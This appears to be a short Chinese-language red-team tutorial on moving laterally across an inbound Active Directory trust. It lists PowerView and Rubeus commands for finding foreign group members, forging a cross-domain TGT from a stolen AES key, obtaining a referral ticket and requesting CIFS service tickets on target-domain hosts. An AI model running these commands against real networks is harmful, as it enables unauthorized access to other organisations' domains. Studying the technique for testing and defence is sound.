Skip to main content

入口信任

入口信任,即目标域信任当前域,当前域可以访问目标域中的资源。要想从当前域移动到信任我们的目标域,我们有以下步骤需要完成。

1:寻找外部组/成员。

我们可以通过 powerview 命令 Get-DomainForeignGroupMember -domain <目标域> 来查询包含目标域之外成员的分组。如果存在外部成员,且该成员在目标域具备特定权限,我们可以模仿该用户并且申请TGT。例如,red.local 域中的用户 web_admin 是 App Admins 的成员,而 App Admins 是 blue.local 的 AdministratorsAPP_Admins 群组的成员,因此 web_admin 可以对 blue.local 的 DC 一些主机具备本地管理员权限。 

2:申请跨域 TGT

rubeus.exe asktgt /user:Administrator /domain:<当前域> /aes256:<外部成员的aes密钥> /opsec /nowrap

image.png

3:使用跨域 TGT 申请 referral 票据

rubeus.exe asktgs /service:krbtgt/<目标域> /domain:<当前域> /dc:<当前域DC> /ticket:<跨域 TGT 票据>

image.png

4:申请 TGS

rubeus.exe asktgs /service:cifs/<目标域主机> /domain:<目标域> /dc:<目标域 DC>

image.png

5:访问资源

image.png

Back to top